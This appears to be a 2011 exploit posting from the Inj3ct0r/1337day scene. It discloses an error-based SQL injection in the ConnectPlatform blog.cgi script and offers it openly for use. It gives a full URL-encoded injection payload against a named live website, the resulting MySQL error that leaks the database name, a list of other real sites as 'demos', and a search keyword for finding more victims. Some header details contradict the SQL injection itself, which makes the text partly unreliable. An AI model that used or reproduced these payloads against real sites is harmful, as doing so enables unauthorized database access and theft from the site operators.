============================================================ ConnectPlatform <= Remote (blog.cgi) Based SQL Injection ============================================================ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com [~] HomePage : http://h4x0resec.blogspot.com - http://griadamlar.com - 1337day.com [~] Reference : http://h4x0resec.blogspot.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : ConnectPlatform |~Price : N/A |~Version : 0.30 |~Software: http://connectplatform.com/ |~Vulnerability Style : Cookie Handling |~Vulnerability Dir : / |~Google Keyword : Powered by: PHPDirector 0.30 |[~]Date : "26.04.2011" |[~]Tested on : Web Server: Apache/2.2.3 (CentOS) DB Server: MySQL AND demos ---------------------------------------------------------- blog.cgi <= 'id' Functions Not Security --------------------------------------------------------- Demos http://jobs.blacknews.com/cgi-bin/ http://blackcollegemagazine.com/cgi-bin/ http://www.irshelp.tv/cgi-bin/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== |{~~~~~~~~ Explotation| SQL Injection ~~~~~~~~~~}| http://jobs.blacknews.com/cgi-bin/blog.cgi?id=1 'SQL Console' START! example : http://jobs.blacknews.com [~] SQL Injecting(Db Name Get..) http://jobs.blacknews.com/cgi-bin/blog.cgi?cid=Inj3ct0r%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1 [~]MysqL Error : Duplicate entry '~'hbcu_central'~1' for key 1 [+]Database Name is found "hbcu_central" to Continue Explotation region Example Based error attack = > http://www.1337day.com/exploits/14509 ================================================================ # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ & __ ____/___ __ \___ |_ \/ /___ / / /___ |___ __/___ / _ / __ __ /_/ /__ /| |__ / __ /_/ / __ /| |__ / __ / / /_/ / _ _, _/ _ ___ |_ / _ __ / _ ___ |_ / _ /__ \____/ /_/ |_| /_/ |_|/_/ /_/ /_/ /_/ |_|/_/ /____/ KaCaK - MUS4LLAT - ameN - TechnicaL - Neuromancer - MahseN _____ __________ /_______ _________________ __ ___/_ __/_ __ `/__ ___/__ ___/ _(__ ) / /_ / /_/ / _ / _(__ ) /____/ \__/ \__,_/ /_/ /____/